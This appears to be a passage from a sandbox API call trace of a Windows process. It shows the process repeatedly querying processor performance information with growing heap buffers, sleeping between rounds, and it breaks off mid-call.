[0199.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.926] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.927] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.929] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.929] Sleep (dwMilliseconds=0x110) [0199.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.938] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.945] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.946] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.946] Sleep (dwMilliseconds=0x110) [0199.950] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.950] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.951] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.951] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.951] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.951] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.954] Sleep (dwMilliseconds=0x110) [0199.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.973] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.974] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.974] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.974] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.974] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.974] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.974] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.975] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.975] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.976] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.976] Sleep (dwMilliseconds=0x110) [0199.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.984] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0199.985] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0199.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0199.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0199.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.987] Sleep (dwMilliseconds=0x110) [0199.998] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0199.998] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0199.999] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0199.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0199.999] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.005] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.006] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.006] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.006] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.007] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.007] Sleep (dwMilliseconds=0x110) [0200.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0200.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0200.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.020] Sleep (dwMilliseconds=0x110) [0200.028] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0200.028] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.029] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0200.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.035] Sleep (dwMilliseconds=0x110) [0200.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0200.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0200.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.051] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.052] Sleep (dwMilliseconds=0x110) [0200.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0200.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0200.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.066] Sleep (dwMilliseconds=0x110) [0200.084] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0200.084] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.085] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.085] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0200.085] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.085] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.085] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.086] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.086] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.086] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.086] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.087] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.087] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.088] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.088] Sleep (dwMilliseconds=0x110) [0200.091] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0200.091] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.092] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0200.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.097] Sleep (dwMilliseconds=0x110) [0200.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0200.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.114] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0200.114] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.115] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.115] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.115] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.115] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.115] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.115] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.116] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.116] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.117] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.117] Sleep (dwMilliseconds=0x110) [0200.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0200.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0200.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.176] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.177] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.177] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.181] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.182] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.182] Sleep (dwMilliseconds=0x110) [0200.210] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0200.210] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.210] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.210] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0200.210] NtQuerySystemInformation (in: SystemInformationClass=0x8, 